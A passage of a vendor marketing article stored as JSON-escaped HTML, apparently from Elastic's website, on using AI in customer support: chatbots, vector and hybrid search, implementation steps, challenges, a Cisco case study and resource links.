a line at the in-person checkout stations while all the self-checkout stations are free. This is what happens when convenience tools aren’t all that convenient. For a while, that was the case with many customer service “solutions.” Remember early chatbots like Ikea’s \u003c/span\u003e\u003cspan style=\"font-size: 12pt;\"\u003e\u003cem\u003eAnna\u003c/em\u003e\u003csup\u003e1\u003c/sup\u003e\u003c/span\u003e\u003cspan style=\"font-size: 12pt;\"\u003e and Alaska Airlines’ \u003c/span\u003e\u003cspan style=\"font-size: 12pt;\"\u003e\u003cem\u003eAsk Jenn\u003c/em\u003e\u003c/span\u003e\u003csup\u003e2\u003c/sup\u003e\u003cspan style=\"font-size: 12pt;\"\u003e? When tech is more clunky than useful, customers bypass it altogether.\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style=\"font-size: 12pt;\"\u003eYet, 90% of customers expect an immediate response to customer service issues.\u003csup\u003e3\u003c/sup\u003e Enter artificial intelligence (AI) customer support tools, which have become game changers for businesses hoping to streamline their customer service systems.\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style=\"font-size: 12pt;\"\u003eAI integrations in customer support have become essential and expected by customers. Gartner has forecasted that generative AI (GenAI) will power 80% of customer service and support operations by 2028.\u003csup\u003e4\u003c/sup\u003e And it’s not all about customer-facing interactions — AI can assist human agents by providing them with insights to help them give customers a top-notch experience.\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style=\"font-size: 12pt;\"\u003eAs AI is increasingly normalized for customer support systems, businesses need to understand how to implement the best tools for the most value. Personalization is the key to effective customer support. By personalizing solutions to your business and your customers, you can anticipate their needs — which is at the core of any good customer experience.\u003c/span\u003e\u003c/p\u003e"},{"title_l10n":"What is AI in customer support?","_metadata":{"uid":"cs87312efbee26bbf6"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style=\"font-size: 12pt;\"\u003eAI is used in customer support to create smoother, more personalized interactions while lightening the load for human customer service reps. Most commonly, AI is used in chatbots that use \u003c/span\u003e\u003ca href=\"https://www.elastic.co/what-is/machine-learning\"\u003e\u003cspan style=\"font-size: 12pt;\"\u003emachine learning (ML)\u003c/span\u003e\u003c/a\u003e\u003cspan style=\"font-size: 12pt;\"\u003e and in \u003c/span\u003e\u003ca href=\"https://www.elastic.co/what-is/natural-language-processing\"\u003e\u003cspan style=\"font-size: 12pt;\"\u003enatural language processing (NLP)\u003c/span\u003e\u003c/a\u003e\u003cspan style=\"font-size: 12pt;\"\u003e to mimic human speech and resolve customer issues. But AI in customer support doesn’t begin and end with chatbots. From virtual assistants to AI-powered search, companies can integrate AI into almost every facet of the user experience to support their customer service teams. The goal isn’t to \u003c/span\u003e\u003cspan style=\"font-size: 12pt;\"\u003e\u003cem\u003ereplace\u003c/em\u003e\u003c/span\u003e\u003cspan style=\"font-size: 12pt;\"\u003e customer support but to \u003c/span\u003e\u003cspan style=\"font-size: 12pt;\"\u003e\u003cem\u003eenhance\u003c/em\u003e\u003c/span\u003e\u003cspan style=\"font-size: 12pt;\"\u003e it.\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style=\"font-size: 12pt;\"\u003eWhen used to its fullest potential, AI can help customer support teams boost productivity, increase customer satisfaction, and bolster their bottom line. Long-term customers are more profitable and cheaper to retain, and they talk up their favorite brands to peers. Good customer service can turn tentative customers into brand loyalists. But customer expectations are also rising. Users expect frictionless experiences that resolve their issues faster and better than before. And 80% of customers claim that the experience that a company provides is as important as its product and services.\u003csup\u003e5\u003c/sup\u003e So, being behind the curve might mean losing them. Therefore, it’s no surprise that businesses are scrambling to implement AI tools for customer service.\u0026nbsp;\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style=\"font-size: 12pt;\"\u003eHere’s how to do it right to satisfy customers and streamline customer success operations.\u003c/span\u003e\u003c/p\u003e"},{"title_l10n":"Diverse AI technologies in customer support","_metadata":{"uid":"cs5002aa63b567fa90"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eAI has significantly expanded what can be automated in customer service. While chatbots are still the most common and most accessible AI tool for customer support, they might not be the best fit for your business. Familiarizing yourself with the landscape can help you decide which AI tool will best serve your teams and your customers.\u003c/span\u003e\u003c/p\u003e"},{"title_l10n":"Chatbots","_metadata":{"uid":"cse9f3d9dcd77182d1"},"header_style":"H3","paragraph_l10n":"\u003cp\u003e\u003ca href=\"https://www.elastic.co/search-labs/blog/enhancing-chatbot-capabilities-with-nlp-and-vector-search-in-elasticsearch\"\u003e\u003cspan style='font-size: 12pt;'\u003eChatbots\u003c/span\u003e\u003c/a\u003e\u003cspan style='font-size: 12pt;'\u003e are automated systems that can tackle basic questions and routine tasks, giving customers quick answers and easing the load on human agents. They’re built to handle tons of interactions at once and are a staple for any high-traffic support system.\u003c/span\u003e\u003c/p\u003e"},{"title_l10n":"Virtual assistants","_metadata":{"uid":"cs5335d752664e9a34"},"header_style":"H3","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eVirtual assistants can manage more sophisticated queries than chatbots and give customer interactions a more personalized touch. They’re a better option than chatbots if a user needs to be guided through a complex process.\u003c/span\u003e\u003c/p\u003e"},{"title_l10n":"Vector search","_metadata":{"uid":"csebd98115906827ca"},"header_style":"H3","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eWhen customers are searching for something but aren’t using the exact keywords, \u003c/span\u003e\u003ca href=\"https://www.elastic.co/what-is/vector-search\"\u003e\u003cspan style='font-size: 12pt;'\u003evector search\u003c/span\u003e\u003c/a\u003e\u003cspan style='font-size: 12pt;'\u003e can help. Through embeddings — numerical representations of data that capture its context — vector search can identify information that’s conceptually like the search term even when exact matches of keywords aren’t being used.\u003c/span\u003e\u003c/p\u003e"},{"title_l10n":"Hybrid search","_metadata":{"uid":"csd1d96334b2f549d2"},"header_style":"H3","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eHybrid search combines different search techniques like vector and keyword search to deliver better \u003c/span\u003e\u003ca href=\"https://www.elastic.co/what-is/search-relevance\"\u003e\u003cspan style='font-size: 12pt;'\u003erelevance\u003c/span\u003e\u003c/a\u003e\u003cspan style='font-size: 12pt;'\u003e. It blends dense and sparse embeddings to fine-tune the balance between understanding context and matching specific terms.\u003c/span\u003e\u003c/p\u003e"},{"title_l10n":"Natural language processing (NLP)","_metadata":{"uid":"cs02688aae7eba45d0"},"header_style":"H3","paragraph_l10n":"\u003cp\u003e\u003ca href=\"https://www.elastic.co/what-is/natural-language-processing\"\u003e\u003cspan style='font-size: 12pt;'\u003eNLP\u003c/span\u003e\u003c/a\u003e\u003cspan style='font-size: 12pt;'\u003e is used to interpret and respond to human language with nuanced understanding. It lets chatbots and virtual assistants grasp what a customer is saying and respond in a way that makes sense and feels like a natural conversation.\u003c/span\u003e\u003c/p\u003e"},{"title_l10n":"Machine learning algorithms","_metadata":{"uid":"csc2412e1d62147885"},"header_style":"H3","paragraph_l10n":"\u003cp\u003e\u003ca href=\"https://www.elastic.co/what-is/machine-learning\"\u003e\u003cspan style='font-size: 12pt;'\u003eMachine learning\u003c/span\u003e\u003c/a\u003e\u003cspan style='font-size: 12pt;'\u003e algorithms are at the heart of AI’s continuous improvement. By analyzing vast amounts of data from previous interactions, machine learning helps AI systems refine and improve their future responses.\u003c/span\u003e\u003c/p\u003e"},{"title_l10n":"Automated response systems (ARS)","_metadata":{"uid":"csc0a949b1beb61cae"},"header_style":"H3","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eThese systems are designed to handle large volumes of customer queries. They automate responses to common questions and issues so that human agents don’t get overwhelmed and can focus on more complex customer issues instead.\u003c/span\u003e\u003c/p\u003e"},{"title_l10n":"AI-powered analytics","_metadata":{"uid":"cs3e3534e86a5d40d2"},"header_style":"H3","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eWith AI-powered analytics, you can dive deep into customer data and find insights that help you predict what customers want. It also helps you make informed decisions about the best ways to tailor your support strategies in the future.\u003c/span\u003e\u003c/p\u003e"},{"title_l10n":"Implementing AI in customer support","_metadata":{"uid":"cscf67455e62ddad77"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eA roadblock for many businesses that want to experiment with AI is the implementation process. Integrating AI into your existing systems doesn’t have to be intimidating. The right tools and the right partners make adding AI integrations intuitive. But to find the right tools, the first step is to establish exactly what your goals are. Only by knowing what your business — and your customers — really need can you make significant improvements to your customer support systems. Here’s how to implement AI in customer support.\u003c/span\u003e\u003c/p\u003e"},{"title_l10n":"Step 1: Understand your customers well ","_metadata":{"uid":"csd812cbbe6949c555"},"header_style":"H3","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eWhat are their demographics and interests? What are their pain points? Do they respond more positively to voice or digital interactions? By understanding the customer, you can tailor your solutions to proactively address their needs.\u003c/span\u003e\u003c/p\u003e"},{"title_l10n":"Step 2: Determine if you want AI to improve your self-service tools or support your human agents (chances are you’ll want to do a little of both)","_metadata":{"uid":"cs8ed8973fc478182f"},"header_style":"H3","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cstrong\u003eSelf-service\u003c/strong\u003e\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e provides your customers with tools that’ll help them serve themselves. Virtual agents or chatbots are usually a good choice here. Normally this process requires analyzing customer queries, understanding their intent, and then having a customer service expert create dialogue flows to help the customer get where they need to be. These flows were often time-consuming to create — a \u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cem\u003eChoose Your Own Adventure\u003c/em\u003e\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e-style of writing that could easily go off course if the customer sends it a curveball. Fortunately, generative AI has made the process a lot simpler. Not only does it make building the flows easier, but it’s also more resilient to digressions and variations during customer interactions.\u0026nbsp;\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cstrong\u003eSupporting your human agents with AI\u003c/strong\u003e\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e is another approach you can take. A new call center agent might be spending a lot of time searching knowledge bases, documentation, and case histories to get the right answer for a customer. GenAI can retrieve information faster and summarize it quickly, cutting down customer wait times in the process. If you’ve ever been on hold for a long time, you know how much this can improve the customer experience. Another way GenAI can help is by automatically drafting responses to customer emails based on what they’re asking and any context available. The customer service rep can then review the email before it’s sent to make sure it makes sense and appropriately handles the query.\u003c/span\u003e\u003c/p\u003e"},{"title_l10n":"Step 3: Determine what experience you want to create ","_metadata":{"uid":"csc78b4754d098cbb5"},"header_style":"H3","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eYou know your audience, and you have a general idea of the ways you’d like to serve them. It’s time to map out your end-to-end customer journeys (chances are you’ll have at least a few) and then look at the best tools to support them. Don’t limit yourself to budget concerns as you brainstorm these journeys — go big. You can rein things in during the next step.\u003c/span\u003e\u003c/p\u003e"},{"title_l10n":"Step 4: Think about your budget and ROI ","_metadata":{"uid":"cs90bbd6b8e73f074f"},"header_style":"H3","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eFirst, calculate the cost of different AI tools and technologies — and remember to factor in both your upfront investment \u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cem\u003eand\u003c/em\u003e\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e ongoing expenses, maintenance, and updates.\u0026nbsp; When you have all that assessed, consider your ROI. Using the in-house data you have, think about the different ways your plan will improve customer satisfaction and how that will affect your bottom line.\u0026nbsp;\u003c/span\u003e\u003c/p\u003e"},{"title_l10n":"Step 5: Design the customer experience end to end ","_metadata":{"uid":"cs20a2d9e20b7dc6e6"},"header_style":"H3","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eIt’s time to look back at Step 3 with Step 4’s budget in mind. Choose your tools and design strategies that serve both your customers and agents.\u003c/span\u003e\u003c/p\u003e"},{"title_l10n":"Step 6: Train your customer service team ","_metadata":{"uid":"cs18ff159a0d7ac2f9"},"header_style":"H3","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eCan your customer service reps seamlessly pick up a conversation if a chatbot passes one to them? Do they understand when and where to intervene if a customer is having a poor experience that the AI tools can’t solve? Do they have a basic understanding of how to use the technology correctly during interactions and gather insights from it later? By training your customer service team, you can still succeed in giving customers a personalized experience when AI struggles to provide answers.\u003c/span\u003e\u003c/p\u003e"},{"title_l10n":"Step 7: Review data and iterate ","_metadata":{"uid":"cs5c6c35681e1301c3"},"header_style":"H3","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eAI makes this process easier, too. For example, a big chunk of a call center’s job is documenting conversations. GenAI can make transcripts of every call, which gives time back to the operators. It can also use these transcripts to come up with insights as to why certain calls are taking longer or if certain products or services are having issues that need to be reported to the product and marketing departments.\u0026nbsp;\u003c/span\u003e\u003c/p\u003e"},{"title_l10n":"Challenges of AI in customer support","_metadata":{"uid":"cs61ba2fe25ec12902"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eImplementing a new technology comes with its challenges. And despite the potential of AI, some customers — and some teams — might be skeptical. With the right AI tool and the right implementation process, you can get past most of the common obstacles. Here are some of the potential challenges of AI in customer support and how to solve them.\u003c/span\u003e\u003c/p\u003e"},{"title_l10n":"Managing customer expectations","_metadata":{"uid":"cs643fbc4e34421cb3"},"header_style":"H3","paragraph_l10n":"\u003cp\u003e\u003cspan style=\"font-size: 12pt;\"\u003eAccording to a recent Gartner study, some customers may worry that GenAI will just add another barrier between them and a real agent. Others are concerned it’ll provide the wrong answers or possibly even be biased against certain customers.\u003csup\u003e6\u003c/sup\u003e\u0026nbsp;\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style=\"font-size: 12pt;\"\u003e\u003cstrong\u003eSolution:\u003c/strong\u003e\u003c/span\u003e\u003cspan style=\"font-size: 12pt;\"\u003e It will be up to your business to communicate to customers how AI can make the service experience better. Be upfront: Let customers know when they’re interacting with AI. And never hesitate to escalate complex cases to human agents when AI falls short.\u003c/span\u003e\u003c/p\u003e"},{"title_l10n":"Privacy and security concerns","_metadata":{"uid":"cs11d84693eabd59cd"},"header_style":"H3","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eAny system that handles customer data is a prime target for hackers, and AI is no exception. These systems often need to process large amounts of personal information, so privacy and security can’t just be an afterthought.\u0026nbsp;\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cstrong\u003eSolution:\u003c/strong\u003e\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e You’ll need to stay on top of data protection laws and regularly update your security measures to keep up with new threats — it’s crucial for maintaining customer trust.\u003c/span\u003e\u003c/p\u003e"},{"title_l10n":"Technical integration issues","_metadata":{"uid":"csa1bae6e9996b4adf"},"header_style":"H3","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eMany companies still rely on older systems that weren’t built with AI in mind. This can mean upgrades — often expensive and time-consuming ones.\u0026nbsp;\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cstrong\u003eSolution:\u003c/strong\u003e\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e Start with a thorough assessment of your current systems, looking for areas where AI can fit in smoothly and where upgrades are necessary. Phased rollouts can help minimize disruptions, allowing you to iron out issues before scaling up.\u003c/span\u003e\u003c/p\u003e"},{"title_l10n":"Resistance from support teams","_metadata":{"uid":"cs57ea96ad1f0e9540"},"header_style":"H3","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eSupport teams might push back against AI integration because they’re resistant to a new way of doing things, or they’re worried that automation will replace them.\u0026nbsp;\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cstrong\u003eSolution:\u003c/strong\u003e\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e The key here is to involve the team from the start, offer plenty of training, and show them how AI can make their jobs easier, not take them away.\u003c/span\u003e\u003c/p\u003e"},{"title_l10n":"Continuous updates and maintenance","_metadata":{"uid":"cs30ec0a4b9e644fca"},"header_style":"H3","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eAI systems need regular updates to keep up with changing customer needs and new tech developments. If companies don’t keep up, they risk their AI falling behind and becoming more of a liability than an asset.\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cstrong\u003eSolution:\u003c/strong\u003e\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e You’ll want to establish a schedule for regular system reviews and updates as well as invest in ongoing learning for your AI systems by feeding them fresh data and refining their algorithms.\u003c/span\u003e\u003c/p\u003e"},{"title_l10n":"Key benefits of AI in customer support","_metadata":{"uid":"cse3ee6a0075ed8d26"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eOnce you’ve pushed through the challenges, you get to reap the benefits of AI in customer support. Here are some of the ways AI in customer support can transform your business:\u003c/span\u003e\u003c/p\u003e\u003cul\u003e\u003cli\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cstrong\u003e24/7 availability:\u003c/strong\u003e\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e Customers will have access to assistance around the clock, regardless of time zones or business hours.\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003cli\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cstrong\u003eInstant response:\u003c/strong\u003e\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e AI delivers immediate answers and solutions and keeps the customer experience smooth and frustration-free.\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003cli\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cstrong\u003ePersonalized service:\u003c/strong\u003e\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e Customer data helps AI tailor its responses and recommendations. This helps it make each customer experience feel personable.\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003cli\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cstrong\u003eEnhanced efficiency:\u003c/strong\u003e\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e AI streamlines support operations by automating routine tasks and inquiries. This lets human agents focus on more complex and nuanced issues.\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003cli\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cstrong\u003eReduced costs:\u003c/strong\u003e\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e Automating processes means less money spent on manual tasks and more streamlined operations.\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003cli\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cstrong\u003eImproved data collection and analysis:\u003c/strong\u003e\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e AI digs into every customer interaction to gather valuable insights, helping you understand trends and improve your support strategy.\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003cli\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cstrong\u003eScalability of support operations:\u003c/strong\u003e\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e AI handles increasing volumes easily so that your business can expand without growing pains.\u003c/span\u003e\u003c/li\u003e\u003c/ul\u003e"},{"title_l10n":"Case study: How Cisco transformed its support experience","_metadata":{"uid":"cs021533698dadff23"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style=\"font-size: 12pt;\"\u003eFounded in 1984, Cisco is the backbone of the global network economy, serving more than 87% of Fortune 500 companies. But with millions of service requests and countless documents to sift through, it faced a real challenge: how to deliver quick and accurate support with such substantial volume.\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style=\"font-size: 12pt;\"\u003eThe solution was an overhaul of Cisco’s search capabilities powered by AI. To do this, \u003c/span\u003e\u003ca href=\"https://www.elastic.co/customers/cisco\"\u003e\u003cspan style=\"font-size: 12pt;\"\u003eCisco partnered with Elastic\u003c/span\u003e\u003c/a\u003e\u003cspan style=\"font-size: 12pt;\"\u003e to revamp its customer support system. \u003c/span\u003e\u003ca href=\"https://www.elastic.co/enterprise-search\"\u003e\u003cspan style=\"font-size: 12pt;\"\u003eElasticsearch\u003c/span\u003e\u003c/a\u003e\u003cspan style=\"color: rgb(52, 55, 65);font-size: 12pt;\"\u003e, running on\u0026nbsp;\u003c/span\u003e\u003ca href=\"https://www.elastic.co/elastic-cloud-kubernetes\"\u003e\u003cspan style=\"font-size: 12pt;\"\u003eElastic Cloud on Kubernetes\u003c/span\u003e\u003c/a\u003e\u003cspan style=\"color: rgb(52, 55, 65);font-size: 12pt;\"\u003e, is now the engine at the center of Cisco’s new enterprise search architecture. \u003c/span\u003e\u003cspan style=\"font-size: 12pt;\"\u003eThis new tool, c\u003c/span\u003e\u003cspan style=\"color: rgb(52, 55, 65);font-size: 12pt;\"\u003ealled \u003c/span\u003e\u003cspan style=\"font-size: 12pt;\"\u003eRe-imagined Topic Search, saves Cisco’s support engineers 5,000 hours a month. Now, engineers can quickly pull up relevant documents and similar cases whether they're helping customers over the phone or online.\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style=\"font-size: 12pt;\"\u003e“Feedback from our engineers is extremely positive,” says Sujith Joseph, principal enterprise search and cloud architect at Cisco Systems. “They now use Topic Search to solve 90% of service requests. They can deliver a better customer experience by easily finding on-target information and fixing issues much faster than before.”\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style=\"font-size: 12pt;\"\u003eCisco.com also got a major AI upgrade. \u003c/span\u003e\u003cspan style=\"font-size: 12pt;\"\u003eIt’s now powered by the Re-imagined Search Platform, an\u0026nbsp;AI\u003c/span\u003e\u003cspan style=\"color: rgb(52, 55, 65);font-size: 12pt;\"\u003e \u003c/span\u003e\u003ca href=\"https://www.elastic.co/enterprise-search\"\u003e\u003cspan style=\"font-size: 12pt;\"\u003esearch solution\u003c/span\u003e\u003c/a\u003e\u003cspan style=\"color: rgb(52, 55, 65);font-size: 12pt;\"\u003e\u0026nbsp;\u003c/span\u003e\u003cspan style=\"font-size: 12pt;\"\u003ebuilt on\u003c/span\u003e\u003cspan style=\"color: rgb(52, 55, 65);font-size: 12pt;\"\u003e\u0026nbsp;\u003c/span\u003e\u003ca href=\"https://www.elastic.co/partners/google-cloud\"\u003e\u003cspan style=\"font-size: 12pt;\"\u003eGoogle Cloud\u003c/span\u003e\u003c/a\u003e\u003cspan style=\"color: rgb(52, 55, 65);font-size: 12pt;\"\u003e\u0026nbsp;\u003c/span\u003e\u003cspan style=\"font-size: 12pt;\"\u003eservices and Elasticsearch\u003c/span\u003e\u003cspan style=\"font-size: 12pt;\"\u003e. This overhaul has slashed search response times by 73% and boosted user engagement while reducing operational costs.\u0026nbsp;\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style=\"font-size: 12pt;\"\u003eSince rolling out Re-imagined Search across customer support and Cisco.com, Cisco’s search team has also integrated it into more than 50 internal and external apps, including the Cisco intranet.\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style=\"font-size: 12pt;\"\u003e“Today, people expect instant search access to the information they need,” Joseph adds. “Keeping customers and potential customers aligned with relevant content about our solutions and services is fundamental to these relationships.”\u003c/span\u003e\u003c/p\u003e"},{"title_l10n":"Harness AI for customer support with Elastic","_metadata":{"uid":"cs8169bf822615fd01"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003ca href=\"https://www.elastic.co/generative-ai\"\u003e\u003cspan style='font-size: 12pt;'\u003eElasticsearch\u003c/span\u003e\u003c/a\u003e\u003cspan style='font-size: 12pt;'\u003e combines generative AI with powerful search technology to boost self-service support and streamline agent workflows. It taps into your organization’s own data, knowledge base, and process docs to deliver precise answers and smart recommendations, all while keeping document security tight and costs low.\u003c/span\u003e\u003c/p\u003e"}],"_metadata":{"uid":"cs5b7ea6bba111f2e0"}}},{"callout":{"title_l10n":"AI for customer support resources","_metadata":{"uid":"csdec2749ecaeaf1f6"},"paragraph_l10n":"\u003cul\u003e\n \u003cli\u003e\u003ca href=\"https://www.elastic.co/learn/transform-customer-support-with-ai-powered-search\"\u003e\u003cspan style=\"font-size: 12pt;\"\u003eTransform customer support with AI search\u003c/span\u003e\u003c/a\u003e\u003c/li\u003e\n \u003cli\u003e\u003ca href=\"https://www.elastic.co/cloud/generative-ai-trial-overview\"\u003e\u003cspan style=\"font-size: 12pt;\"\u003eExplore generative AI in a free trial\u003c/span\u003e\u003c/a\u003e\u003c/li\u003e\n \u003cli\u003e\u003ca href=\"https://www.elastic.co/blog/genai-customer-support-building-proof-of-concept\"\u003e\u003cspan style=\"font-size: 12pt;\"\u003eGenAI for customer support - Part 1: Building our proof of concept\u0026nbsp;\u003c/span\u003e\u003c/a\u003e\u003c/li\u003e\n \u003cli\u003e\u003ca href=\"https://www.elastic.co/search-labs/blog/genai-customer-support-building-a-knowledge-library\"\u003e\u003cspan style=\"font-size: 12pt;\"\u003eGenAI for customer support - Part 2: Building a knowledge library\u003c/span\u003e\u003c/a\u003e\u003c/li\u003e\n \u003cli\u003e\u003ca href=\"https://www.elastic.co/search-labs/blog/genai-elastic-elser-chat-interface\"\u003e\u003cspan style=\"font-size: 12pt;\"\u003eGenAI for customer support - Part 3: Designing a chat interface for chatbots\u003c/span\u003e\u003c/a\u003e\u003cspan style=\"font-size: 12pt;\"\u003e\u0026nbsp;\u003c/span\u003e\u003c/li\u003e\n \u003cli\u003e\u003ca href=\"https://www.elastic.co/blog/customer-service-government-ai\"\u003e\u003cspan style=\"font-size: 12pt;\"\u003eWhy customer service matters for government — and how AI will help\u003c/span\u003e\u003c/a\u003e\u003c/li\u003e\n \u003cli\u003e\u003ca href=\"https://www.elastic.co/explore/improving-digital-customer-experiences/implementing-search-for-your-knowledge-base\"\u003e\u003cspan style=\"font-size: 12pt;\"\u003eImplementing search and generative AI for your knowledge base\u003c/span\u003e\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e","callout_reference":[],"callout_type":"Information (info)"}},{"title_text":{"title_text":[{"title_l10n":"","_metadata":{"uid":"cs959ec36bfa49385a"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003csup\u003e1\u003c/sup\u003e \u003ca href=\"https://www.chatbots.org/virtual_assistant/anna3/\"\u003e\u003cspan style=\"font-size: 10pt;\"\u003eChatbot Anna\u003c/span\u003e\u003c/a\u003e\u003csup\u003e\u003cbr superscript=\"[object Object]\"/\u003e\u003c/sup\u003e\u003csup\u003e2\u003c/sup\u003e \u003ca href=\"https://www.chatbots.org/virtual_assistant/jenn/\"\u003e\u003cspan style=\"font-size: 10pt;\"\u003eChatbot Jenn\u003c/span\u003e\u003c/a\u003e\u003cspan style=\"font-size: 10pt;\"\u003e\u003csup\u003e\u003cbr superscript=\"[object Object]\"/\u003e\u003c/sup\u003e\u003c/span\u003e\u003csup\u003e3\u003c/sup\u003e\u003cspan style=\"font-size: 10pt;\"\u003e Hubspot \u003c/span\u003e\u003ca href=\"https://www.hubspot.com/hubfs/assets/flywheel%20campaigns/HubSpot%20Annual%20State%20of%20Service%20Report%20-%202022.pdf\"\u003e\u003cspan style=\"font-size: 10pt;\"\u003eAnnual State of Service\u003c/span\u003e\u003c/a\u003e\u003cspan style=\"font-size: 10pt;\"\u003e, 2022\u003cbr /\u003e\u003c/span\u003e\u003csup\u003e4\u003c/sup\u003e \u003ca href=\"https://www.gartner.com/en/newsroom/press-releases/2023-08-30-gartner-reveals-three-technologies-that-will-transform-customer-service-and-support-by-2028\"\u003e\u003cspan style=\"font-size: 10pt;\"\u003eGartner Hype Cycle\u003c/span\u003e\u003c/a\u003e\u003cspan style=\"font-size: 10pt;\"\u003e, 2023\u003cbr /\u003e\u003c/span\u003e\u003csup\u003e5\u003c/sup\u003e\u003cspan style=\"font-size: 10pt;\"\u003e\u003csup\u003e\u003c/sup\u003e\u003c/span\u003e\u003cspan style=\"font-size: 10pt;\"\u003e Salesforce, \u003c/span\u003e\u003ca href=\"https://www.salesforce.com/resources/research-reports/state-of-the-connected-customer/\"\u003e\u003cspan style=\"font-size: 10pt;\"\u003eState of the Connected Customer\u003c/span\u003e\u003c/a\u003e\u003cspan style=\"font-size: 10pt;\"\u003e, 6th Edition\u003cbr /\u003e\u003c/span\u003e\u003csup\u003e\u003c/sup\u003e\u003cspan style=\"font-size: 10pt;\"\u003e\u003csup\u003e\u003c/sup\u003e\u003c/span\u003e\u003csup\u003e6\u003c/sup\u003e \u003cspan style=\"font-size: 10pt;\"\u003eGartner, \u003c/span\u003e\u003ca href=\"https://www.gartner.com/en/webinar/631278/1394124\"\u003e\u003cspan style=\"font-size: 10pt;\"\u003e4 Key Customer Insights to Guide Your Service CX Strategies\u003c/span\u003e\u003c/a\u003e\u003cspan style=\"font-size: 10pt;\"\u003e, 